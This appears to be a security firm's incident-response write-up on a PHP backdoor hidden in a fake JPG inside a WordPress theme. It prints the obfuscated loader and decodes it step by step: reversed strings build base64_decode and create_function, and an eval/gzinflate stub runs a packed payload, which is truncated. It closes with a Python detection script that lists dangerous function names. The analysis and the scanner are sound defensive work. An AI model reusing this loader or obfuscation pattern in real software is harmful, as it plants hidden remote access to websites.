Malicious Backdoor Hidden Inside Fake Image

Labs Note

During an incident response investigation, we detected an interesting backdoor that was hidden in a fake image. The attacker was quite creative, splitting the attack into two stages.

The attacker created two files. The first file was a normal-looking PHP file whose only job was to include the fake image.

Let's review the content of the PHP file "./wp-content/themes/twentythirteen/images/3.php":

<?php include("check-db.jpg"); ?>

Looking at the code inside "./wp-content/themes/twentythirteen/images/3.php", we see a strange use of the include function: it includes check-db.jpg. PHP does not care about the extension of an included file, it parses and executes whatever PHP code the file contains, so this is a useful indicator, but the include statement by itself is not malware.

Let's go ahead and inspect the image "check-db.jpg". When we tried to open the file in the browser it looked as if the image was corrupt, as nothing was displayed.

We then opened the file in a normal text editor and found the main source of the backdoor.

<?php $_S="7RpdbxvH8d2A/8P6wvhIhJ+iZFsij07hyHFQp3Zip2gr…yATx5A1QePTKD1/kV6K8xfVv";$_A=strrev("esab")."64_".strrev("edoced");$_X=$_A('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7');$trd=strrev("taerc")."e_f".strrev("noitcnu");$ctel=$trd('$_S',$_X);$ctel($_S); ?>

Let's work through the malicious code located inside the fake image "./wp-content/themes/twentythirteen/images/check-db.jpg" step by step to see how it works and how it gives the attacker access to your website files.

First, the variable $_S holds the packed payload: a base64-encoded, deflate-compressed blob that, once unpacked, is the actual backdoor code the attacker will use to gain access to your website.

$_S="7RpdbxvH8d2A/8P6wvhIhJ+iZFsij07hyHFQp3Zip2gr…yATx5A1QePTKD1/kV6K8xfVv";

The variable $_A is built from two reversed strings and the literal "64_", so after the strrev calls run it holds the function name base64_decode.

$_A before the strrev calls are evaluated:

$_A=strrev("esab")."64_".strrev("edoced");

$_A after the strrev calls are evaluated:

$_A = "base64_decode";

Next, the attacker calls the function whose name is stored in $_A (base64_decode) on a base64-encoded string literal.

The decoded result is stored in $_X. It is not executed at this point: it is a single line of PHP source that will later become the body of the backdoor function.

$_X before it is decoded by base64_decode:

$_X = $_A('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7');

$_X after it is decoded by base64_decode:

$_X = 'eval(gzinflate(base64_decode($_S)));';

The variable $trd is assembled the same way and, once the strrev calls run, holds the function name create_function.

$trd before the strrev calls are evaluated:

$trd=strrev("taerc")."e_f".strrev("noitcnu");

$trd after the strrev calls are evaluated:

$trd = "create_function";

With both names resolved, the last two statements read:

$ctel = create_function('$_S', 'eval(gzinflate(base64_decode($_S)));');
$ctel($_S);

create_function builds an anonymous function whose single parameter is $_S and whose body is the decoded $_X. Calling $ctel($_S) passes the packed payload in, where it is base64-decoded, decompressed with gzinflate and handed to eval. That eval runs the real backdoor, giving the attacker full access to your website files and folders.
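As an added illustration (not part of the original Labs Note, and not Sucuri's tooling), the following Python script performs the same unpacking steps statically and turns the indicators from the walkthrough into checks a scanner can run over PHP files: an include of a non-PHP extension, function names assembled with strrev, and base64 literals that decode to code calling eval, gzinflate or base64_decode. The two sample file contents are constructed to mirror 3.php and check-db.jpg; the real $_S blob is truncated in the post, so a placeholder string stands in for it.

```python
"""Static triage for the two-stage image backdoor described above (added example)."""
import base64
import binascii
import re

# Constructed sample contents modelled on the post's 3.php and check-db.jpg.
# PAYLOAD_PLACEHOLDER stands in for the truncated $_S blob shown on the page.
LOADER_PHP = '<?php include("check-db.jpg"); ?>'
FAKE_IMAGE = (
    '<?php $_S="PAYLOAD_PLACEHOLDER";'
    '$_A=strrev("esab")."64_".strrev("edoced");'
    "$_X=$_A('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7');"
    '$trd=strrev("taerc")."e_f".strrev("noitcnu");'
    "$ctel=$trd('$_S',$_X);$ctel($_S); ?>"
)

PHP_EXTENSIONS = (".php", ".phtml", ".inc")
# Names that signal a packed PHP backdoor when assembled at run time or found
# inside decoded data (assumed list; extend to taste).
SUSPICIOUS_NAMES = ("eval", "gzinflate", "base64_decode", "create_function",
                    "assert", "system", "passthru", "shell_exec", "str_rot13")

INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*["\']([^"\']+)["\']')
# A chain of strrev("...") and "..." pieces joined with '.', e.g. strrev("esab")."64_"
CONCAT_RE = re.compile(
    r'(?:strrev\("[^"]*"\)|"[^"]*")(?:\s*\.\s*(?:strrev\("[^"]*"\)|"[^"]*"))+'
)
PIECE_RE = re.compile(r'strrev\("([^"]*)"\)|"([^"]*)"')
B64_LITERAL_RE = re.compile(r'["\']([A-Za-z0-9+/]{16,}={0,2})["\']')


def resolve_concat(expr):
    """Statically evaluate a concatenation made only of strrev("...") calls and
    string literals, which is how the sample assembles its function names."""
    return "".join(rev[::-1] if rev else lit for rev, lit in PIECE_RE.findall(expr))


def decode_b64_literal(literal):
    """Return the decoded text of a base64 literal, or None if it is not valid base64."""
    try:
        return base64.b64decode(literal, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def scan_php_source(src):
    """Return a list of human-readable findings for one PHP source file."""
    findings = []
    # Indicator 1: include/require of a file that does not carry a PHP extension.
    for path in INCLUDE_RE.findall(src):
        if not path.lower().endswith(PHP_EXTENSIONS):
            findings.append(f"include of non-PHP file: {path}")
    # Indicator 2: a dangerous function name built from reversed string pieces.
    for m in CONCAT_RE.finditer(src):
        if "strrev(" not in m.group(0):
            continue
        name = resolve_concat(m.group(0))
        if name in SUSPICIOUS_NAMES:
            findings.append(f"function name built with strrev: {name}")
    # Indicator 3: a base64 literal that decodes to PHP calling dangerous functions.
    for literal in B64_LITERAL_RE.findall(src):
        decoded = decode_b64_literal(literal)
        if decoded is None:
            continue
        hits = [n for n in SUSPICIOUS_NAMES if n + "(" in decoded]
        if hits:
            findings.append(f"base64 literal decodes to code calling: {', '.join(hits)}")
    return findings


if __name__ == "__main__":
    for name, src in (("3.php", LOADER_PHP), ("check-db.jpg", FAKE_IMAGE)):
        print(name)
        for finding in scan_php_source(src) or ["no findings"]:
            print("  -", finding)
```

Run against the two constructed samples, the loader is flagged only for including a .jpg, while the fake image yields the resolved names base64_decode and create_function plus the decoded eval(gzinflate(base64_decode($_S))) stub. Any one of those three findings is worth a manual look; all three together on one file are a strong sign of this family of packed backdoor.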


If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.
